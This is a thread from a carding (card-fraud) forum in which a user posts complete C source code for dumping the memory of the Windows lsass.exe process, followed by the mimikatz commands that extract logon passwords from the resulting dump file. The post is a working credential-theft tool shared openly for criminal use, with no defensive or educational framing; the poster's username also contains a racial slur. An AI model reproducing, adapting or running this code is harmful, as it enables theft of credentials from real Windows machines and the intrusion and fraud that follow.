Go Back   Carder.life > [en] International Forum > Hacking & Coding
Reload this Page /CODE/lsass mem dump for mimikatz

CARDER.MARKET - CARDING FORUM FOR PROFESSIONAL CARDERS


 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1  
Old 03-20-2025, 10:11 AM
lilbossnigga's Avatar

lilbossnigga lilbossnigga is offline
Join Date: Mar 2021
Posts: 2
Default

Code:
//lsass mem dump

//

//coded by sasami_327

////////////////////////////////////////////////////////

#include <Windows.h>

#include <DbgHelp.h>

#include <stdio.h>

#include <TlHelp32.h>

#pragma comment(lib, "dbghelp")

#define CWA(dll, api)	::api

BOOL EnableSeDebugPrivilege(VOID)

{

	HANDLE token = NULL;

	LUID luid, *pluid;

	TOKEN_PRIVILEGES tokenPriv, *ptokenPriv;

	BOOL ret = FALSE;

	if ( CWA(kernel32, OpenProcessToken)(CWA(kernel32, GetCurrentProcess()), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &token) )

	{

		printf("Successfully OpenProcessToken\n");

		pluid = &luid;

		if ( CWA(kernel32, LookupPrivilegeValueA(NULL, "SeDebugPrivilege", pluid)) )

		{

			printf("Successfully LookupPrivilegeValueA\n");

			ptokenPriv = &tokenPriv;

			ptokenPriv->PrivilegeCount = 1;

			ptokenPriv->Privileges[0].Luid = luid;

			ptokenPriv->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

			if ( AdjustTokenPrivileges(token, FALSE, ptokenPriv, 0, 0, NULL) )

			{

				printf("Successfully AdjustTokenPrivileges\n");

				ret = TRUE;

			}

			else

			{

				printf("Failed to AdjustTokenPrivileges with error=%d\n", GetLastError());

			}

		}

		else

		{

			printf("Failed to LookupPrivilegeValueA with error=%d\n", GetLastError());

		}

		CWA(kernel32, CloseHandle)(token);

	}

	else

	{

		printf("Failed to OpenProcessToken with error=%d\n", GetLastError());

	}

	return(ret);

}

VOID dump(DWORD pid)

{

	HANDLE process = NULL;

	HANDLE file = NULL;

	if ( ( process = CWA(kernel32, OpenProcess)(PROCESS_QUERY_INFORMATION|PROCESS_VM_  READ, FALSE, pid) ) )

	{

		if ( INVALID_HANDLE_VALUE != ( file = CWA(kernel32, CreateFileA)("lsass.dmp", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) ) )

		{

			if ( CWA(dbghelp, MiniDumpWriteDump)(

											process,

											pid,

											file,

											MiniDumpWithFullMemory,

											NULL,

											NULL,

											NULL

											) )

			{

				printf("OK\n");

			}

			CWA(kernel32, CloseHandle)(file);

		}

		CWA(kernel32, CloseHandle)(process);

	}

}

DWORD GetPIDByProcessName(char* procName)

{

	DWORD retPID = -1;

	PROCESSENTRY32 pEntry32, *ppEntry32;

	HANDLE snapshot = NULL;

	if ( INVALID_HANDLE_VALUE != (snapshot = CWA(kernel32, CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0)) )

	{

		ppEntry32 = &pEntry32;

		ppEntry32->dwSize = sizeof(pEntry32);

		if ( CWA(kernel32, Process32First(snapshot, ppEntry32)) )

		{

			for ( ; ; )

			{

				if ( !strcmp(procName, ppEntry32->szExeFile) )

				{

					retPID = ppEntry32->th32ProcessID;

					break;

				}

				if ( !CWA(kernel32, Process32Next(snapshot, ppEntry32)) )

				{

					if ( ERROR_NO_MORE_FILES == GetLastError() )

					{

						break;

					}

				}

			}

		}

		CWA(kernel32, CloseHandle)(snapshot);

	}

	return(retPID);

}

int main(int argc, char* argv[])

{

	DWORD lsass = GetPIDByProcessName("lsass.exe");

	if ( -1 != lsass )

	{

		printf("lsass=%d\n", lsass);

		if ( EnableSeDebugPrivilege() )

		{

			dump(lsass);

		}

	}

	return(0);

}

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
 

Tags
NULL

« Previous Thread | Next Thread »
Thread Tools
Display Modes
Threaded Mode Threaded Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is On
Forum Jump




All times are GMT. The time now is 09:21 PM.

Contact Us - Carder.life - Archive - Top